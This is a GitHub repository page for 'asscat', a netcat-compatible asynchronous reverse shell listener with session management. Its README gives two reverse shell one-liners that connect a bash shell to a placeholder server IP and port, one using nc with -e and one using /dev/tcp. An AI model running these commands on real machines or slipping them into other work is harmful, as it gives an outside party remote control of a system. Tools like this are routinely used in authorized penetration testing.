Skip to content
/ asscat Public

NetCat compatible asynchronous reverse shell listener

Notifications You must be signed in to change notification settings

DCx7C5/asscat

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 

Repository files navigation

AssCat🍑

Async (Reverse) Shell Server


Features

  • session management

Supports raw shell clients like:

nc <SERVER_IP> <SERVER_PORT> -e /bin/bash

or:

bash -i >& /dev/tcp/<SERVER_IP>/<SERVER_PORT> 0>&1

etc...

About

NetCat compatible asynchronous reverse shell listener

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages